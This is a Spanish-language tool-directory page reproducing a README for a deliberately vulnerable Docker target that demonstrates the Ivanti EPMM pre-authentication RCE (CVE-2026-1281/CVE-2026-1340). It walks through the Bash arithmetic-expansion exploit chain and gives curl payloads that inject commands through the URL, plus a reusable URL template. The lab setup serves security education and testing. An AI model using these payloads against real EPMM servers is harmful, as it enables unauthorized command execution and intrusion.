Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad RCE de pre-autenticación en Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad. | Kitploit
Herramientas/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad RCE de pre-autenticación en Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad.

Ver Repositorio
3hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Objetivo Dummy de RCE pre-auth de Ivanti EPMM

Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad de RCE pre-auth de Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad.

Resumen de la Vulnerabilidad

Esta vulnerabilidad explota el comportamiento de la expansión aritmética de Bash. Cuando una variable que contiene una referencia a otra variable se usa en un contexto aritmético, y esa variable referenciada contiene un índice de array con sustitución de comandos, el comando se ejecuta.

La Cadena de Explotación

  1. La solicitud contiene st=theValue (cadena literal "theValue" con relleno)
  2. La solicitud contiene h=gPath[\comando`]` (comando en el índice del array)
  3. El script Bash analiza los pares clave=valor en un bucle, actualizando theValue en cada iteración
  4. gStartTime se establece en la cadena literal "theValue"
  • Después del bucle, theValue contiene gPath[\comando`]`
  • Cuando se evalúa [[ ${currentTime} -gt ${gStartTime} ]]:
    • ${gStartTime} → "theValue" (cadena)
    • El contexto aritmético trata theValue como referencia a variable
    • theValue → gPath[\comando`]`
    • El índice del array activa la sustitución de comandos → ¡RCE!
  • Inicio Rápido

    root@kitploit:~
    # Construir e iniciar el contenedor
    docker-compose up --build -d
    
    # Verificar que está en ejecución
    curl http://localhost:8180/health
    

    Probando la Vulnerabilidad

    1. Prueba de Creación de Archivo

    Crea un archivo para demostrar la ejecución de comandos:

    root@kitploit:~
    # Payload codificado en URL: id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # Verificar si el archivo fue creado
    cat artifacts/poc
    

    2. Prueba Basada en Tiempo

    Verifica con un comando sleep:

    root@kitploit:~
    # Debería tardar ~5 segundos en responder
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. Ejecución de Comando Personalizado

    root@kitploit:~
    # Escribir contenido personalizado
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    Estructura de la URL

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMANDO%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ Payload: gPath[`COMANDO`]
                                   │      │              └─ Marca de tiempo final (cualquier 10 dígitos)
                                   │      └─ CRÍTICO: "theValue" literal + 2 espacios (10 caracteres en total)
                                   └─ Índice de clave (cualquier valor)
    

    Depuración

    root@kitploit:~
    # Ver los registros del contenedor
    docker-compose logs -f
    
    # Obtener un shell en el contenedor
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # Ver los registros de error de nginx
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    Limpieza

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    Referencias

    • Publicación del Blog de WatchTowr Labs

    Aviso Legal

    Esto es solo para fines educativos y de pruebas de seguridad autorizadas. No lo utilices contra sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de prueba.

    Descargar herramienta